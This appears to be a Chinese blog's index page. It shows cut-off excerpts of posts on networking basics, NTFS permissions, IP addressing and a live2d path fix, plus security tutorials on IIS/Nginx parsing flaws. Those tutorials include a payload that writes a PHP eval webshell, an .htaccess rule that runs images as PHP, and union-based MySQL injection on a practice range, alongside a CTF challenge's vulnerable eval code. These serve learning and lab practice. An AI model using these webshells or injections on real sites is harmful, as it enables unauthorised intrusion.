《计算机网络自顶向下方法》(计算机网络和因特网)(1)
0x01 什么是因特网?
1.1 具体构成描述
因特网是一个世界范围 的计算机网络,即它是一个互联了遍及全世界数十亿计算设备的网络。
不久之前,这些计算设备大多数传统PC、服务器等等,然而现在有越来越多的非传统因特网设备与因特网相连,如智能手机、电视、游戏机、家用电器、手表等。
用因特网术语来说,这些设备都成为主机(host)或者端系统(end system)
端系统通过**通信链路(communication link)和分组交换机(packet switch)**连接到一起
一台端系统要向另一台端系统发送数据时,发送端系统将数据分段,并为每段加上首部字节。由此形成的信息包成为分组(packet)
分组交换机:当今最著名的两种类型是路由器(router)和链路层交换机(link-layer switch)
从发送端系统到接收端系统,一个分组所经历的一系列通信链路和分组交换机成为通过该网络的路径(path)
端系统通过**因特网服务提供商(Internet Service Provider,ISP)**接入因特网
每个 ISP 自身就是一个由多台分组交换机和多段通信链路组成 ...
Failed to load resource
最近搭博客想弄一个live2d的人物出来玩,于是去网上尝试了各种办法,眼看着就要成功
但是 你知道的,没有bug的程序不是一个好程序,不会修bug的程序员不是一个好程序员
bug们想尽各种办法出现,只为了锻炼我们的能力
比如:
在我这里他们是同一种错误,只是不同的浏览器而已
我在网上看了无数的文章,参考了无数的方法,都不太行,只能说不是我报错的类型
看着这些404 not found 我觉得很大可能是路径问题
加上很多文章也说路径问题
于是进行了修改:
1<link rel="stylesheet" href="live2d/live2d/css/live2d.css" />
更改后:
1<link rel="stylesheet" href="./live2d/live2d/css/live2d.css" />
有点作用,’ ./ ’ 表示当前目录,它找得到这个css文件了,但是其他网页怎么办,难不成每个网页都配一个这个文件夹?
于是我改成绝对路径:
1<link ...
求斜渐近线
如果limn→∞[f(x)−kx−b]=0,则y=kx+b是曲线的斜渐近线如果\lim\limits_{n \to \infty} [f(x)-kx-b]=0,则y=kx+b是曲线的斜渐近线
如果n→∞lim[f(x)−kx−b]=0,则y=kx+b是曲线的斜渐近线
求法:limn→∞f(x)x=k,且limn→∞f(x)−kx=b,斜渐近线为y=kx+b求法:\lim\limits_{n \to \infty} \cfrac{f(x)}{x} = k,且\lim\limits_{n \to \infty} f(x)-kx=b,斜渐近线为y=kx+b
求法:n→∞limxf(x)=k,且n→∞limf(x)−kx=b,斜渐近线为y=kx+b
NTFS权限
0x01 NTFS权限概述
通过设置NTFS权限,实现不同的用户访问不同的权限
分配了正确的访问权限后,用户才能访问其资源
设置权限防止资源被篡改、删除
0x02 文件系统概述
文件系统即在外部存储设备上组织文件的方法
常见的文件系统:
123FAT WindowsNTFS WindowsEXT Linux常见
0x03 NTFS文件系统特点
提高磁盘读写性能
可靠性
加密文件系统
访问控制列表(ACL)(设置权限)
磁盘利用率
压缩
磁盘配额(管理服务器)
支持单个文件大于4GB
0x04 修改NTFS权限
4.1 修改权限继承
作用:取消后,可以任意修改权限列表
方法:文件夹右键属性—安全—高级—去掉第一个对号—选择复制即可
4.2 文件及文件权限
文件权限
权限内容
完全控制
拥有读取、写入、修改、删除文件、特殊的权限
修改
拥有读取、写入、修改、删除文件的权限
读取和执行
拥有读取、执行文件的权限
读取
拥有读取文件的权限
写入
拥有修改文件内容的权限
特殊权限
控制文件权限列表的权限
...
git clone出错
输入:
123git config --global http.proxy http://127.0.0.1:1080git config --global https.proxy http://127.0.0.1:1080
如果无效则输入:
123git config --global --unset http.proxygit config --global --unset https.proxy
IP地址详解
0x01 IP(IPv4)
IP地址是唯一的标识,分为a、b、c、d四个字段,形式为X.X.X.X,每个字段都由32位的二进制数字构成,所以每个字段范围都是0-255(但我们可以使用的IP不包括0和255)
1如:10.2.1.1 、 192.168.1.1
0x02 子网掩码
局域网通信规则:在同一局域网中,所有的IP必须在同一网段中才可以互相通信
IP地址构成:网络位+主机位(网络位相同的IP地址,属于同一网段)
子网掩码:每一个IP地址必须配一个子网掩码,用来确定IP地址的网络位
子网掩码如何确定网络位:与255对应的数字为网络位,与0对应的数字为主机位
1255.0.0.0 、 255.255.0.0 、 255.255.255.0
12345678910如:10.1.1.1 255.0.0.0则10.1.1.1属于10.0.0.0这个网段,主机名字叫1.1.110.1.1.1 255.255.0.0则10.1.1.1属于10.1.0.0这个网段,主机名字叫1.110.1.1.1 255.255.255.0则10.1.1.1属于10.1.1.0这个网段,主机 ...
解析漏洞
0x01 IIS5.x/6.0解析漏洞
IIS6.0解析利用的方法有两种:
目录解析
在网站下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都别IIS当作asp文件来解析并执行。例如创建目录pamela.asp,那么pamela.asp / 1.jpg将被当作asp文件来执行。
文件解析
在IIS6.0下,分号后面的不被解析,也就是说pamela.asp;.jpg会被服务器看成是pamela.asp,还有 IIS6.0默认的可执行文件除了asp还包括这三种:
123pamela.asapamela.cerpamela.cdx
0x02 IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞
在默认Fast-CGI开启状况下,上传一个名字为pamela.jpg,内容为
123<?PHPfputs(fopen('shell.php','w'),'<?php eval(&_POST[cmd])?>');?>
的文件,然后访问pamela.jpg/.ph ...
.htaccess文件上传漏洞
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以实现:网页301重定向、自定义404页面、改文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
需要用到的代码如下:
1SetHandler application/x-httpd-php .png .jpg
通过.htaccess文件,调用php的解析器解析一个文件名只要是.png .jpg格式的文件,可以自己视实际情况添加。这个文件的内容如果是一句话木马,即可利用中国菜刀进行连接。
实战意义:
如果存在可以上传.htaccess文件,就可以直接利用规则解析
如果存在修改.htaccess文件权限,修改解析规则
注意:
.htaccess文件不能起名字,他就是.htaccess文件,如果你将他改为4.htaccess或者其他的什么名字是不可以的,无法解析。在实战中有可能上传上去这个文件会被自动重命名,被重命名了就不可以了。
MySQL简单手工注入
题目是墨者里的一道入门题
访问靶场,找到有注入点的地方
一、测试是否有注入漏洞
在需要传递参数的地方进行测试
发现页面显示有错,则存在注入漏洞:
猜解列名数量(字段数),使用order by来进行猜解
报错猜解准备 例如:?id=-1 union select 1,2,3,4
二、信息收集
版本:version()
数据库名字:database()
用户名:user()
操作系统:@@version_compile_os
…
因此能找出以下信息:
版本:5.7.22-0ubuntu0.16.04.1
数据库名字:mozhe_Discuz_StormGroup
用户名:root@localhost
操作系统:Linux
三、数据注入
在MySQL5.0以上的版本中,MySQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名和列名的数据库,也相当于可以通过它获取指定数据库下面的表名或列名信息
数据库中用符号"."代表下一级
information_schema.tables:记录所有表名的表
infor ...
2021 GUET梦极光杯
有一道web题,源码如下:
123456789101112131415 <?phperror_reporting(0);highlight_file(__FILE__);if (isset($_POST['code'])) { $code = $_POST['code']; if (!preg_match("/[A-Za-z0-9;()]/", $code)) { ob_start(); eval("echo " . $code . ";"); $output = ob_get_contents(); ob_clean(); if ($output === "guetctf") { echo getenv("FLAG"); } }}
很明显可以看到我们要构造 ‘ ...